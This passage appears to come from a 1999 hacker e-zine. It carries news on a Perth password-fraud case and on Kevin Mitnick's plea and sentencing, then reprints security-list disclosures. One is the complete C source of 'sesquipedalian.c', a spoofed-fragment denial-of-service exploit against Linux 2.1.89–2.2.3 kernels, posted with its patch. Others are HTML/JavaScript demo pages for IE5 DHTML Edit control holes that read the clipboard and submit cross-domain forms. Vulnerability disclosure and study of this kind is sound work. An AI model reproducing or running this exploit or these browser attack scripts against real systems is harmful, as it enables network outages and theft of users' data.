the ISP noticed inconsistencies and contacted police.
Detective Senior Constable Mike Wheeler from the WA major
fraud squad said people gaining access to Net passwords was
a widespread problem, not limited to this particular ISP.

The accounts in this case were all with one ISP, Vianet in WA.
Vianet managing director Tony Broughton was not available for
comment this afternoon.

<previous related story>

22/03/99 15:51

Net fraud: Aussie man charged
Roulla Yiacoumi

A 20-year old Perth man is facing 12 months in jail over Internet
fraud amounting to just $50 worth of Net access.

Christopher Thomas Daniels of Cannington has been charged
by the Western Australian major fraud squad for accessing
other people's Internet accounts. He faces 37 counts of
unlawfully operating a computer system.

According to Detective Senior Constable Mike Wheeler,
Daniels admitted to having passwords to more than 350
accounts, but he had used only 37. The accounts were all for
prepaid access from one of Australia's larger ISPs, and the
customers affected were unaware that their accounts had
been accessed.

"The ISP noticed inconsistencies and notified us," said
Wheeler. "But let me say that this kind of problem is not
restricted to just one ISP."


The WA man said he was given the passwords by another
person, a juvenile who will be subject to a different court
system.

Daniels is set to appear in court tomorrow. He faces up to 12
months in jail or a fine of up to $4,000.


This article is located at
http://newswire.com.au/9903/nfraud.htm

@HWA

04.0 Mitnick Updates
~~~~~~~~~~~~~~~

04.1 The Bumper Sticker Stays
~~~~~~~~~~~~~~~~~~~~~~~~
from Chaos theory
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2229344,00.html


After reflecting on the long, strange case of Kevin Mitnick,
I've decided that the "Free Kevin" bumper sticker's not
coming off my car-- not yet.
By Kevin Poulsen March 22, 1999

After four long years in the house of many doors, 35-year-old Kevin
Mitnick is ready to swallow a bitter pill, plead guilty to some of the
twenty-five felonies on his indictment plate and accept a prison
sentence a few months longer than the time he's already spent in stir.

But I'm not scraping the Free Kevin bumper sticker from my car any time
soon.

The sticker stays because Tuesday's sealed plea agreement is now on the
desk of Judge Mariana Pfaelzer, who may yet reject it as summarily as she
refused to allow him the due process of a bail hearing.

The sticker also stays because Mitnick is still facing a dusty California
state charge from the early '90s which threatens to flip him out of the
frying pan of federal lockup and into the fire of the notorious Los
Angeles Country Jail-- better known as Hell.

And even after his eventual release, Mitnick will spend up to three
years in a technophobic virtual prison, barred from touching anything
with a trace of silicon in it.

So the sticker will continue to adorn my bumper as a reminder of the
end of an era, and the dawn of a new and harsh morning. Kevin grew up
to the extent that he did at a time when computers were still seen as
mysterious and arcane, and exploring them was an innocent and joyful
pastime for a few privileged youngsters. There was no talk of cyber-
terrorism then; no suggestion that teenage technophiles were foreign
operatives acting to overthrow the government. Kids who weren't old
enough to drive were manipulating dizzying technology from their own
bedrooms, and it was magic, pure and simple.

Kevin Mitnick was already a legendary magician when I got my first
computer in the early '80s. In today's Internet age, talentless
teenaged taggers make national headlines by using pre-fab cracking
tools to deface sitting-duck websites. So it takes some imagination
to understand the genuine skill and artistry possessed by the
likes of Kevin.

He gained his knowledge from dumpsters and libraries and by tricking
the guardians of technology with telephone con games.Applying that
knowledge, doing things that weren't supposed to be possible,required
creativity, resourcefulness, and tools that couldn't simply be downloaded.

He was the archetypal trickster, sharing the joy of discovery with
friends and loved ones through ingenious pranks; his hapless victims
usually ended up too impressed with the magic to be overly annoyed
with the inconvenience. While it seems inconceivable now, Mitnick didn't
even cloak his efforts under a pseudonym. He was simply Kevin Mitnick.

There was no reason to hide because what he was doing wasn't a crime.
Nobody even minded much at first. It was all good clean fun.

The Playground's Closed

Then the world began to change, while Kevin remained the same.
Communism died, and a notional hacker threat replaced the red
menace as the enemy of everything good, decent, and American.

The Internet took off in the early '90s, and pressure grew in
Congress to make cyberspace safe for shopping. Computers
were no longer the billion-dollar brains controlling our lives;
instead they were on our desks and in our homes, and no one
liked the idea that people like Kevin might get into them and
muck around.

Suddenly, the hacking that everyone around him thought was
clever, amusing, and harmless during Mitnick's formative years
became "computer fraud and abuse." Examining computer source
code became "theft of proprietary information," and was equated
to stealing money from a bank.

Before he knew it, Kevin was a "danger to the community," held
without bail like a murderer. And his rights were given the
treatment normally reserved for accused drug kingpins. He was soon
in front of an openly hostile court, facing the full brunt of a
federal prosecution, as he watched the seasons change through the
semitransparent polymer slits that pass for jailhouse windows.

There was never any doubt that Kevin was guilty of at least some
of the charges against him. There was never any doubt that he
caused a lot of innocent people some serious hassles, and he needed
to be slapped down. That was never really he point. The "Free Kevin"
bumper sticker is on my car because every day that he spends locked
up raises the punitive bar of zero tolerance another notch.

Kevin Mitnick never damaged anything. He never stole a dime, never
tried to profit from his efforts. He remained a laughing Peter Pan,
while the world changed. I suspect he never really understood that
his victims were no longer laughing along with him. He never lost
his innocence.

The sticker is there as a reminder of the new paradigm that punishes
dumb innocence more severely than true guilt more harshly than fraud,
theft, and robbery. The sticker is there because jail does a slow
violence to a person, and Kevin Mitnick didn't deserve four years of
that violence.


-=-

-=-


04.2 Mitnick's Judgment Day at Hand
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Douglas Thomas

9:00 a.m. 25.Mar.99.PST
LOS ANGELES -- Celebrity cracker Kevin Mitnick will appear before US
District Court Judge Marianne Pfaelzer on Friday for what could be the
last time. Pfaelzer is scheduled to rule on a plea agreement jointly
submitted by the government and defense team attorneys. Although neither
side has discussed the details, a report leaked last week said Mitnick
will plead guilty in exchange for a reduced sentence. The arrangement
reportedly calls for Mitnick to spend at least an additional year in
prison.

Mitnick, in custody since 1995, is charged with copying proprietary
software from the computers of cellular telephone manufacturers. Over
the years, he has grown to be the cause célèbre of hackers and crackers
the world over. Friday's scheduled appearance won't be the first time
that Pfaelzer has considered a plea agreement from Mitnick.

In 1989, Mitnick pleaded guilty to possessing unauthorized long-distance
codes and copying security software from the Digital Equipment Corporation.
Pfaelzer rejected a plea bargain in that case, and Mitnick spent a year in
prison and six months in a halfway house.

If Pfaelzer accepts the current plea, it would mean the end of the federal
indictment. Mitnick, however, still faces state charges stemming from a
1993 arrest. He is accused of fraudulently obtaining information from the
Department of Motor Vehicles and faxing it to a copy shop in Los Angeles.

If found guilty, Mitnick could face up to four years of additional prison time.


04.3 Why We Still Have to Free Kevin Mitnick...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Update from <a href="http://www.kevinmitnick.com/home.html">www.kevinmitnick.com</a>

Why We Still Have to Free Kevin Mitnick...
Assistant US Attorneys Defy Court Order Again

March 30, 1999

So Kevin Mitnick has pleaded guilty and reached an agreement with the federal
authorities. The story is over. Thanks for participating. You can all go home
now.

Not so fast.

If you've ever been robbed at gunpoint, you know the feeling of wanting to
resist, but then giving up your valuables because you feared the consequences
of what would happen if you resisted more vigorously. We all want to be heroes,
but there comes a time when one needs to make a painful sacrifice in order to
survive at all.

For more than four years, Kevin has held firm in prison, maintaining his
innocence while trying to build a defense against the government's charges. The
process of constructing such a case is a monumental one, even for highly paid
defense attorneys. Now add to the mix the reality of being held captive in a
federal prison that limits your "participation" in your defense to 20 minute
collect phone calls and five hours per week in an inadequate law library, and
you may begin to see what it was like.

Not there yet? Kevin's legal team was overworked and underfunded whereas the
prosecution had unlimited resources and as much time as they needed, not to
mention a compliant court that granted them every excuse for their manipulation
of the facts and circumstances in this case.

Government Defiance of Court Order

Apparently unwilling to miss the opportunity to kick someone while they're
down, government prosecutors David Schindler and Christopher Painter have
walked through Alice's looking glass and turned the law on its head once again
-- they have instructed the legal staff at the Metropolitan Detention Center
(MDC) that Kevin will no longer need access to the laptop computer that Kevin
has been using to prepare his defense; first for the trial, and now for the
sentencing hearing scheduled for June 14, 1999. Here are the circumstances:

The legal staff at MDC supervises the prison's compliance with all legal matters
affecting the prison. Kevin and his legal team convene in the attorney's visiting
room at MDC to use a laptop computer to review the electronic evidence in Kevin's
case. Kevin is currently reviewing that evidence to counter the government's
likely arguments in support of restitution requirements, which in turn are based
upon fictional losses alleged to have been suffered by the alleged victims in this
case.

Illegal Interference by Government

On Monday, March 29, Kevin met his legal team in the visiting room, where they were
going to use the laptop computer to review evidence in preparation for Kevin's
sentencing hearing on June 14. After waiting two hours, Kevin was informed that
either Assistant U.S. Attorneys Schindler or Painter had incorrectly advised MDC
Legal Staff that Kevin would "no longer be needing access to the computer," and
consequently, Kevin would not be permitted access to the laptop in order to prepare
for his sentencing hearing.

Defense Attorney Asserts Federal Court Order

One member of Kevin's defense team (standing in for attorney Don Randolph, Kevin's
attorney of record in this case who is currently on vacation) asserted unequivocally
that there is a federal court order in place with the MDC ordering -- not suggesting,
but ordering -- the MDC to provide access to a laptop computer for Kevin and his legal
staff.

Government's "Logic" Defies Justification

Logic would suggest that if government prosecutors object to a federal court order,
it is their responsibility to petition the court for redress. The actions by the
government are an attempt to turn the situation on its head, and constitute an
apparent effort by AUSAs Schindler and/or Painter to unlawfully influence the
behavior of the legal staff of MDC. In addition, they may have known that Kevin's
lead defense attorney was scheduled to be out of town this week, thus increasing
the likelihood that they would succeed in delaying Kevin's access to the evidence
against him.

Prosecutors in Direct Violation of Court Order

Actions by AUSAs Schindler and/or Painter to manipulate legal staff at MDC are in
direct violation of a federal court order by Judge Marianna Pfaelzer ordering
the MDC to provide a laptop computer to Kevin Mitnick. Their actions are in violation
of federal law, and at this difficult stage of Kevin's case, can have no other
purpose than to interfere with Kevin's right to participate fully in his defense.

Call Your Congresspeople and Local Media

We urge you to call your United States Representative and Senator as well as your
local news media to alert them to the apparently willful violation of a federal
court order by sworn officers of the court. Calls to the office of Rep. Henry
Waxman (D-CA) may prove especially helpful.


@HWA

04.4 Mitnick gets 46 months?
~~~~~~~~~~~~~~~~~~~~~~~

Mitnick Sentenced to 46 Months
by Douglas Thomas

3:00 a.m. 29.Mar.99.PST
The case is not closed on Kevin Mitnick, who was sentenced Friday to 46 months
in prison after pleading guilty to seven counts of wire and computer fraud.
The notorious cracker still faces California charges for computer fraud.

US District Judge Mariana Pfaelzer accepted Mitnick's guilty plea to five of 25
federal counts of fraud plus two counts of fraud in Northern California.

No date has been set for a trial on Southern California charges, which stem from
a 1993 arrest in which Mitnick was accused of fraudulently obtaining information
from the Department of Motor Vehicles. If convicted of those charges, he could
face an additional four years behind bars.

Friday's plea agreement set total damages of up to US$10 million. Prosecutors and
defense lawyers could not reach agreement on restitution, which will be determined
at Mitnick's sentencing hearing, scheduled for 14 June. Final motions and a pre-
sentence investigation report are due by 1 June.

Mitnick has already spent 48 months in a Los Angeles detention center, including 14
months for violating conditions of his supervised release. He could be released to a
halfway house this fall.

But US Attorney David Schindler said Mitnick would be in prison "at least through next
year."


Don Randolph, Mitnick's attorney, said his client was relieved to have his federal
case resolved. In a prepared statement, Randolph said, "[Mitnick] can now see light at
the end of the tunnel, and has a reasonable certainty that it is not another train approaching."


@HWA

05.0 Sesquipedalian.c 0 length connection resetting exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 24 Mar 1999 23:19:37 -0500
From: John McDonald <jmcdonal@UNF.EDU>
To: BUGTRAQ@netspace.org
Subject: DoS for Linux 2.1.89 - 2.2.3: 0 length fragment bug

Hi,

The recent release of the Linux 2.2.4 kernel fixed a remote denial of
service problem in the IP fragment handling code. If you are running a
Linux kernel between 2.1.89 and 2.2.3, it would probably be a good idea to
get the latest version. In case that isn't feasible for you, I've included
a patch in this post. The impact of this problem is that a remote attacker
can effectively disable a target's IP connectivity. However, for the
attack to succeed, the attacker will have to deliver several thousand
packets to the target, which can take up to several minutes. A quick
exploit and the patch are appended to the end of this post.

The problem starts in ip_glue() in ip_fragment.c:

/* Copy the data portions of all fragments into the new buffer. */
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
if ((fp->len < 0) || ((count + fp->len) > skb->len))

                goto out_invalid; 
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {
skb->dst = dst_clone(fp->skb->dst);
skb->dev = fp->skb->dev;
}
count += fp->len;
fp = fp->next;
}

The problem in this code is that if you can get a fragment into the
qp->fragments list that has a length of 0, and is the first fragment in the
list, then the call to dst_clone() will happen an extra time. The first time
through the loop, count will necessarily equal qp->ihlen, causing
dst_clone() to be called. However, if fp->len happens to equal 0, then count
+= fp->len won't increase it, and the next time through the loop, count will
still equal qp->ihlen. dst_clone() increments a usage count on an element in
the routing cache. Our 0 length fragment will cause this element in the
cache to become stranded. The kernel will not free it when it does the
garbage collection of the cache because it will think it is currently in
use.

The other component of the problem is that the call to allocate a new entry
in the routing cache does a check to see if the hashtable that comprises the
cache is at a saturated state. If it is, it proceeds to do a garbage
collection. If the number of entries in the cache, after this garbage
collection, is still higher than the threshold, then dst_alloc() will fail.
So, if we generate enough stranded entries in the routing cache (4096 in
2.2.3) via our malicious frags, then all further calls to dst_alloc will
fail.

We can get a 0 length fragment into the head of the list by doing the
following:

Send a fragment at offset 0, with a length of X, and IP_MF set. This creates
our list.

Send a 0 length fragment at offset 0, where the ip header length is equal to
the ip total length, and IP_MF is set. This will be treated as coming before
the fragment already in our list, because it has an offset equal to the
offset of the existing fragment. It doesn't overlap any, because it's end is
equal to the following fragment's offset.

Send a fragment at offset X, with IP_MF not set. This will mark the end of
our set of fragments. ip_done() will return true because it will see the
first frag going from 0 to 0, the second going from 0 to X, and the third
going from X to the end. Our fragments will get passed into ip_glue().

-horizon

Here is the patch:

--- linux-2.2.3/net/ipv4/ip_fragment.c Wed Mar 24 22:48:26 1999
+++ linux/net/ipv4/ip_fragment.c Wed Mar 24 22:44:24 1999
@@ -17,6 +17,7 @@
* xxxx : Overlapfrag bug.
* Ultima : ip_expire() kernel panic.
* Bill Hawes : Frag accounting and evictor fixes.
+ * John McDonald : 0 length frag bug.
*/

#include <linux/types.h>
@@ -357,7 +358,7 @@
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
- if ((fp->len < 0) || ((count + fp->len) > skb->len))
+ if ((fp->len <= 0) || ((count + fp->len) > skb->len))
goto out_invalid;
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {

And here is the exploit:

/*
* sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
*
* by horizon <jmcdonal@unf.edu>
*
* This sends a series of IP fragments such that a 0 length fragment is first
* in the fragment list. This causes a reference count on the cached routing
* information for that packet's originator to be incremented one extra time.
* This makes it impossible for the kernel to deallocate the destination entry
* and remove it from the cache.
*
* If we send enough fragments such that there are at least 4096 stranded
* dst cache entries, then the target machine will no longer be able to
* allocate new cache entries, and IP communication will be effectively
* disabled. You will need to set the delay such that packets are not being
* dropped, and you will probably need to let the program run for a few
* minutes to have the full effect. This was written for OpenBSD and Linux.
*
* Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>

struct my_ip_header
{
unsigned char ip_hl:4, /* header length */
ip_v:4; /* version */
unsigned char ip_tos; /* type of service */
unsigned short ip_len; /* total length */
unsigned short ip_id; /* identification */
unsigned short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
unsigned char ip_ttl; /* time to live */
unsigned char ip_p; /* protocol */
unsigned short ip_sum; /* checksum */
unsigned long ip_src, ip_dst; /* source and dest address */
};

struct my_udp_header
{
unsigned short uh_sport;
unsigned short uh_dport;
unsigned short uh_ulen;
unsigned short uh_sum;
};

#define IHLEN (sizeof (struct my_ip_header))
#define UHLEN (sizeof (struct my_udp_header))

#ifdef __OpenBSD__
#define EXTRA 8
#else
#define EXTRA 0
#endif

unsigned short checksum(unsigned short *data,unsigned short length)
{
register long value;
u_short i;

for(i=0;i<(length>>1);i++)
value+=data[i];

if((length&1)==1)
value+=(data[i]<<8);

value=(value&65535)+(value>>16);

return(~value);
}

unsigned long resolve( char *hostname)
{
long result;
struct hostent *hp;

if ((result=inet_addr(hostname))==-1)
{
if ((hp=gethostbyname(hostname))==0)
{
fprintf(stderr,"Can't resolve target.\n");
exit(1);
}
bcopy(hp->h_addr,&result,4);
}
return result;
}

void usage(void)
{
fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n");
exit(0);
}


void sendem(int s, unsigned long source, unsigned long dest,
unsigned short sport, unsigned short dport)
{
static char buffer[8192];
struct my_ip_header *ip;
struct my_udp_header *udp;
struct sockaddr_in sa;

bzero(&sa,sizeof(struct sockaddr_in));
sa.sin_family=AF_INET;
sa.sin_port=htons(sport);
sa.sin_addr.s_addr=dest;

bzero(buffer,IHLEN+32);

ip=(struct my_ip_header *)buffer;
udp=(struct my_udp_header *)&(buffer[IHLEN]);

ip->ip_v = 4;
ip->ip_hl = IHLEN >>2;
ip->ip_tos = 0;
ip->ip_id = htons(random() & 0xFFFF);
ip->ip_ttl = 142;
ip->ip_p = IPPROTO_UDP;
ip->ip_src = source;
ip->ip_dst = dest;
udp->uh_sport = htons(sport);
udp->uh_dport = htons(dport);
udp->uh_ulen = htons(64-UHLEN);
udp->uh_sum = 0;

/* Our first fragment will have an offset of 0, and be 32 bytes
long. This gets added as the only element in the fragment
list. */


ip->ip_len = htons(IHLEN+32);
ip->ip_off = htons(IP_MF);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);

if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}

/* Our second fragment will have an offset of 0, and a 0 length.
This gets added to the list before our previous fragment,
making it first in line. */


ip->ip_len = htons(IHLEN);
ip->ip_off = htons(IP_MF);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN);

if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}

/* Our third and final frag has an offset of 4 (32 bytes), and a
length of 32 bytes. This passes our three frags up to ip_glue. */


ip->ip_len = htons(IHLEN+32);
ip->ip_off = htons(32/8);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);

if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}
}

int main(int argc, char **argv)
{
int sock;
int on=1,i;
unsigned long source, dest;
unsigned short sport=53, dport=16384;
int delay=20000, count=15000;

if (argc<3)
usage();

while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1)
{
switch (i)
{
case 's': sport=atoi(optarg);
break;
case 'd': dport=atoi(optarg);
break;
case 'n': count=atoi(optarg);
break;
case 'u': delay=atoi(optarg);
break;
default: usage();
}
}

argc-=optind;
argv+=optind;

source=resolve(argv[0]);
dest=resolve(argv[1]);

srandom(time((time_t)0)*getpid());

if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("socket");
exit(1);
}

if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)
{
perror("setsockopt: IP_HDRINCL");
exit(1);
}

fprintf(stdout,"\nStarting attack on %s ...",argv[1]);

for (i=0; i<count; i++)
{
sendem(sock,source+htonl(i),dest,sport,dport);
if (!(i%2))
usleep(delay);
if (!(i%100))
{
if (!(i%2000))
fprintf(stdout,"\n");
fprintf(stdout,".");
fflush(stdout);
}
}

fprintf(stdout,"\nDone.\n");
exit(1);
}


@HWA

06.0 Yet more MSIE5 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 24 Mar 1999 12:11:09 +0100
From: Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IE 5 security vulnerabilities


Greetings,

Microsoft delivers with IE 5 an Active X control called "DHTML
Edit control Safe for Scripting for IE 5"
. In my opinion this
control IS NOT SAFE AT ALL . I have found two vulnerabilities
in this component : It makes public the clipboard and it allows
cross-frame access.
IE 4 is also affected as far as the control is a signed component
and the browser will download it from MS site.(see below my
comments about the CLSID).
Demos are available at
http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html

I will briefly try to summarize the implications of this issues :

1- The hole makes public the clipboard.
There is nothing new here. This is the third time I have reported
this kind of vulnerability. MS says that this issue can be
blocked by setting the "Allow paste operations via script" to
'prompt'. This security option is set to 'enable' by default
(Medium security). IE 4 does not have this option and there is no
way to avoid the exploit.

2- The hole allows cross-frame access
The first Internet browser security rule is : scripts can only
interact only whit documents same domain and protocol. MS calls
this the cross-frame security, Netscape refers to this rule as
"The same origin security policy". DHTML Editor violates this
rule and allows "transaction spoofing", a malicious script can
submit transactions without the user knowledge. I have asked my
lawyer consultant about the issue and their response was :
"Noboby can anymore use the IP addrress as a proof of an Internet
crime against Internet Explorer users"
. MS says : "We don't see
that this constitutes a security issue"
.

3- Even if Microsoft fixes the hole the hole could exist forever. Why ?
As far as I know this is the first time a hole is "SIGNED". MS
has released an "dhtmed.cab" file as an ActiveX component signed
by Microsoft ,anibody can distribute this file and the victim will
only see a message telling him that the component is "Microsoft
signed"
, I trust MS, everybody trust MS, we will accept the ActiveX.
MS has invented a very clever method to sign software, but there is
not a way to revoke the signature.

4- There is something rare in the CLSID
Whenever an HTML page references a not registered CLSID nothing
happens, just the object is not created. The "DHTML Edit Control"
CLSID (clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A) is very special,
Internet Explorer (4 and 5) will try to download the component from
MS even if CODEBASE is not defined for the object. Is this a
documented feature ? You can test this behaviour, : unregister the
component "dhtmle.ocx" (using regsvr32.exe) and then load the page
http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html
Why the browser decides to go to MS site ? It only knows :
clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A
Acoording whit MS documentation a CODEBASE parameter must be
explicited in the OBJECT "object" to download the component.
Any idea ?

Regards,
Cuartango

-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html

The DHTML Editor holes

Microsoft delivers with IE 5 an Active X control called DHTML edit control,
The Microsoft Dynamic HTML (DHTML) Editing Component allows Web authors and
application developers to add WYSIWYG DHTML editing capabilities to their Web
sites and applications. The control has two versions : DHTML Edit Control for
IE 5 and DHTML Edit

Control Safe for Scripting for IE 5

The first one is of course marked as not safe for scripting and you will be
warned if an HTML page contains this object.
The problem I have found : The second one is not safe at all. "DHTML Edit
Control Safe for Scripting for IE 5"
has in fact at least two security holes :

1- It makes public your clipboard (demo).

According with Microsoft security rules access to Windows clipboard content is
forbidden to Internet Explorer scripts unless the clipboard content was owned
by the Explorer itself. This issue represents an important privacy leak.

Workaround : Set security option "Allow paste operations via script" to "prompt".


2- It allows "cross-frame" access (demo).

An HTML page or frame can read/write contents in frames owned by any domain,
which is forbiden by cross-fame security rules. And still worst, It allows
Tansaction spoofing. This is a very serious danger. The Safe version of
ActiveX is not able to navigate but It can SUBMIT FORMS which means that a
malicious WEB page (or E-Mail) can performs transactions agains any WEB site
but YOU will be responsible because the transaction will have your own IP address.

IE 4 is also affected if you accept the download of the ActiveX (Signed by Microsoft)

Last update March 24 Año del señor de 1999

-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html

<html>

<head>
<meta name="keywords"
content="cuartango,dhtmle hole,dhtmle hole,IE5,IE 5 hole,IE 5,cuartango hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>DHTMLE Clipboard vulnerability</title>
</head>

<body>
<script>
function getcb()
{
dh.DOM.body.innerHTML=""
dh.execCommand(5032);
S1.value = dh.DOM.body.innerText;
}
</script>


<p align="center"><big><big><strong><font color="#FF0000">DHTML Editor Clipboard
vulnerability</font></strong></big></big></p>

<p align="left"><font face="Arial"><small>According with Microsoft security rules access
to Windows clipboard content is forbidden to Internet Explorer scripts unless the
clipboard content was owned by the Explorer itself. If an script performs a
"paste" operation over an input text box the operation will succeed only if data
were copied to the clipboard from the Internet Explorer.</small> <small>The DHTMLE editor
delivered whit Internet Explorer 5 violates the clipboard security rule. The clipboard
data can then be transferred to a form input box and posted to a malicious WEB.</small></font></p>

<p align="center"><font face="Arial"><br>
<small>To see the demo "copy" some text (from any application) and click the
button below :</small><br>
</font><input type="button" value="Paste" name="B1" onclick="getcb()"></p>

<p align="center"><strong><small><font face="Arial">The box below is a Input Text
Area Box your clipboard text data should be here</font></small></strong><textarea rows="4"
name="S1" cols="80"></textarea></p>

<p align="center"><font face="Arial"><strong><small>The box below is</small></strong></font>
<font face="Arial"><strong><small>"DHTML Edit Control Safe for Scripting for IE
5"
</small><br>
</strong></font>
<object id="dh" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="747"
height="105">
</object>
</p>
<div align="center"><center>

<table border="0" width="368" style="border: 1px solid" bgcolor="#C0C0C0">
<tr>
<td width="364"><p align="left"><font face="Arial"><strong><small>The script making public
the clipboard is very simple :</small></strong><br>
<br>
</font><font COLOR="#000000" size="3">function getcb()<br>
{<br>
dh.DOM.body.innerHTML="";
// clear body<br>
dh.execCommand(5032);

// paste<br>
S1.value = dh.DOM.body.innerText; // copy to text area<br>
}</font></td>
</tr>
</table>
</center></div>

<p align="center"><a href="dhtmle1.html"><font face="Arial">Back to DTHMLE Vulnerabilities<br>
</font></a><font COLOR="#000000" face="Courier New" size="2"><br>
</font><font color="#400040">Created by</font> <a href="mailto:cuartangojc@mx3.redestb.es">Juan
Carlos Garcia Cuartango</a> </p>

<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>
</small><font size="1">Visitors since Mar 22 Año del Señor de 1999</font></font></p>

<p><small>Last update Mar 24 Año del señor de 1999</small></p>
</body>
</html>

-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle3.html

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords"
content="cuartango,dhtmle hole,dhtmle hole,IE5,IE 5 hole,IE 5,cuartango hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>DHTMLE vulnerabilities</title>
</head>

<body>
<script>
function fill()
{
dh.DOM.forms(0).T1.value="Don Juan Tenorio";
dh.DOM.forms(0).T2.value="Hosteria del Laurel";
dh.DOM.forms(0).T3.value="Barrio de Santa Cruz";
dh.DOM.forms(0).T4.value="Sevilla";
dh.DOM.forms(0).T5.value="Andalucia";
dh.DOM.forms(0).T6.value="Spain";
dh.DOM.forms(0).T7.value="424122225555";
window.setTimeout("SubmitForm()",1000);
}
function SubmitForm()
{
dh.DOM.forms(0).submit();
}
</script>


<h1 align="center"><small><font color="#FF0000">T<strong>he DHTML Editor cross-frame
hole</strong></font></small></h1>
<div align="left">

<table border="0" width="765" height="388">
<tr>
<td width="246" height="359" valign="top"> <p><small><font face="Arial">The box in the righ
is an DHTML Edit Control Safe for scripting.<br>
It shows a form loaded from a <strong>diferent domain</strong> (<em>www.angelfire.com</em>).<br>
Click the button below and I will fill the form and submit It.</font></small></p>
<p align="center"><small><font face="Arial"><input type="button" value="Demo" name="B1"
onclick="fill()"></font></small></p>
<p><font face="Arial"><small>Dont worry about the message displayed. It is only a demo.</small><br>
<small><br>
</small></font></td>
<td width="511" height="359">
<object classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="497" height="318"
id="dh">
</object>
<script>
dh.LoadURL("http://www.angelfire.com/ab/juan123/dhtmle3form.html");
</script> </td>
</tr>
<tr>
<td width="757" height="21" colspan="2"><p align="center"><font face="Arial"
color="#FF0000"><strong><small>A malicious script inserted in a WEB page or in an HTML
formated e-mail can submit transactions that will contain your IP address. (Imagine an
script writting menaces in the White House guess book)</small></strong></font>.<br>
</td>
</tr>
</table>
</div>

<p align="center"><a href="dhtmle1.html"><font face="Arial">Back to DTHMLE Vulnerabilities<br>
<br>
</font></a><font color="#400040">Created by</font> <a

href="mailto:cuartangojc@mx3.redestb.es">Juan Carlos Garcia Cuartango</a> </p>

<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>
</small><font size="1">Visitors since March 22 Año del Señor de 1999</font></font></p>

<p><small>Last update March 23 Año del señor de 1999</small></p>

<p> </p>
</body>
</html>

-------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 10:06:01 -0800
From: Harry Goodwin <harryg@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5 security vulnerabilities

I wanted to take a moment to thank Juan Carlos for bringing these issues to
Microsoft's attention prior to posting the issues publicly. I also wanted
to post Microsoft's response to the issues he's discovered.

1) Internet Explorer has customizable security settings in
place for users who are concerned about allowing certain functionality. In
this particular case, concerned users can easily block this behavior by
checking either 'disable' or 'prompt' under "Allow paste operations via
script"

in the custom settings section in security zones. Using the IEAK, admins
can also adjust the default setting for this option before distributing
Internet Explorer to their users. The option is set to 'enable' by default
to
allow enhanced functionality.

2) Upon investigation we did find a cross domain security
violation in the DHTML edit control which we will revoke, fix, and release.

3) Internet Explorer has a mechanism in place which allows
Microsoft to release a .reg file to block ActiveX controls by changing a
bit in the registry.

4) The following information found on MSDN (search on
CodeBaseSearchPath) addresses this concern: When Internet Component
Download is called to download code, it traverses the Internet search path
to
look for the desired component. This path is a list of object store servers
that will be queried every time components are downloaded using
CoGetClassObjectFromURL. This way, even if an <OBJECT> tag in an HTML
document does not specify a CODEBASE location to download code for an
embedded OLE control, the Internet Component Download will still use the
Internet search path to find the necessary code.
Internet search path syntax
The search path is specified in a string in the registry, under
the key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\CodeBaseSearchPath. The value for this key is a string in the
following format:
